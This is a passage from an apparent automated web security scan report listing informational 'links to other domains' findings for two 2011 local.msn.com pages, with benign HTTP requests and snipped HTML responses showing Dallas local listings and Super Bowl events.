<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

17.133. http://local.msn.com/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/movies-events.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/movies-events.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://entimg.s-msn.com/i/CS/088884h1.jpg
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/events/search?form=MSNLAP&q=events+near+75207
http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP
http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&p1=[Events+source="vertical"+qzeventid="z130863645"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c100"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1000"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1100"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1200"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1300"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c200"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c300"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c400"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c500"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c600"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c700"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c800"]&form=MSNLAP
http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP
http://www.bing.com/events/search?q=Dining at Nana Restaurant&p1=[Events+source="vertical"+qzeventid="z164424005"]&form=MSNLAP
http://www.bing.com/events/search?q=Dining at Nana Restaurant&p1=[Events+source="vertical"+qzeventid="z164424045"]&form=MSNLAP
http://www.bing.com/events/search?q=Mamma Mia!&p1=[Events+source="vertical"+qzeventid="z129219765"]&form=MSNLAP
http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP
http://www.bing.com/events/search?q=Official Black Eyed Peas Super Bowl Party&p1=[Events+source="vertical"+qzeventid="f579394"]&form=MSNLAP
http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP
http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP
http://www.bing.com/events/search?q=Super Bowl Playboy Party&p1=[Events+source="vertical"+qzeventid="z161455405"]&form=MSNLAP
http://www.bing.com/getimage?q=FEV3_2843a0f4fa9b85c7b077cec9a90921c4_1&wf=Genimage
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660836&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&resize=false
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies-events.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:56 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ce815fcd326246e2a3bf9593c6a1251a; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=62998F535E894010922F966B752F2D13; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:56 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660836&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
</span><a href="http://www.bing.com/events/search?form=MSNLAP&q=events+near+75207" class="attr">Find more events</a>
...[SNIP]...
<div class="events"><a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP" class="featuredlink">
<img alt="Dane Cook" height="100" width="100" src="http://www.bing.com//getimage?q=FEV3_2843a0f4fa9b85c7b077cec9a90921c4_1&wf=Genimage" />
</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP" title="Dane Cook">Dane Cook</a>
...[SNIP]...
<p>On the heels of one of the most successful standup tours in recent history, comedian Dane Cook will ...<a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP">more</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Mamma Mia!&p1=[Events+source="vertical"+qzeventid="z129219765"]&form=MSNLAP" title="Mamma Mia!">Mamma Mia!</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&p1=[Events+source="vertical"+qzeventid="z130863645"]&form=MSNLAP" title="50th Anniversary Celebration presented by Texas Ballet Theater">50th Anniversary Celebration presented by Texas ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Dining at Nana Restaurant&p1=[Events+source="vertical"+qzeventid="z164424005"]&form=MSNLAP" title="Dining at Nana Restaurant">Dining at Nana Restaurant</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP" title="2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks">2011 Dallas Super Bowl Weekend - Fantasy Party - ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Official Black Eyed Peas Super Bowl Party&p1=[Events+source="vertical"+qzeventid="f579394"]&form=MSNLAP" title="Official Black Eyed Peas Super Bowl Party">Official Black Eyed Peas Super Bowl Party</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP" title="Penthouse Magazine "Super Party 2011" Super Bowl event">Penthouse Magazine "Super Party 2011" Super Bowl ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP" title="P. Diddy's Super Bowl Grand Finale Party">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP" title="NFLX After Dark at The NFL Experience">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Super Bowl Playboy Party&p1=[Events+source="vertical"+qzeventid="z161455405"]&form=MSNLAP" title="Super Bowl Playboy Party">Super Bowl Playboy Party</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c100"]&form=MSNLAP">Arts & crafts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c500"]&form=MSNLAP">Education & campus</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1000"]&form=MSNLAP">Performing arts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c200"]&form=MSNLAP">Business & tech</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c600"]&form=MSNLAP">Fairs & festivals</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1100"]&form=MSNLAP">Shopping</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c300"]&form=MSNLAP">Community</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c700"]&form=MSNLAP">Food & dining</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1200"]&form=MSNLAP">Sports & outdoors</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c400"]&form=MSNLAP">Dance</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c800"]&form=MSNLAP">Music</a></li><li class="last"><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1300"]&form=MSNLAP">Visual arts</a>
...[SNIP]...
<a href="http://movies.msn.com/Movies/movie.aspx?m=2277707&mp=m" title="The Mechanic"><img alt="The Mechanic" src="http://entimg.s-msn.com/i/CS/088884h1.jpg" width="130" height="190" /></a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP">Dane Cook</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Dining at Nana Restaurant&p1=[Events+source="vertical"+qzeventid="z164424045"]&form=MSNLAP">Dining at Nana Restaurant</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Official Black Eyed Peas Super Bowl Party&p1=[Events+source="vertical"+qzeventid="f579394"]&form=MSNLAP">Official Black Eyed Peas Super Bowl Party</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP">Penthouse Magazine "Super Party 2011" Super Bowl event</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&resize=false">Feedback</a>
...[SNIP]...

17.134. http://local.msn.com/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/news.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.msn.com/news.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/twitter/search?go=&form=MSNLEC&q=Dallas,TX
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=yiVCumGs&resize=false

Request

GET /news.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f45152614c3e4ca49e6d07087dc62948; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BBEE80DF1DB647F3A47A789FFB5EA112; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660834&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.msn.com%2Fnews.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=February+2&mkt=en-us&FORM=MSNLEC">Wednesday, Feb. 02, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomemsn.com/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
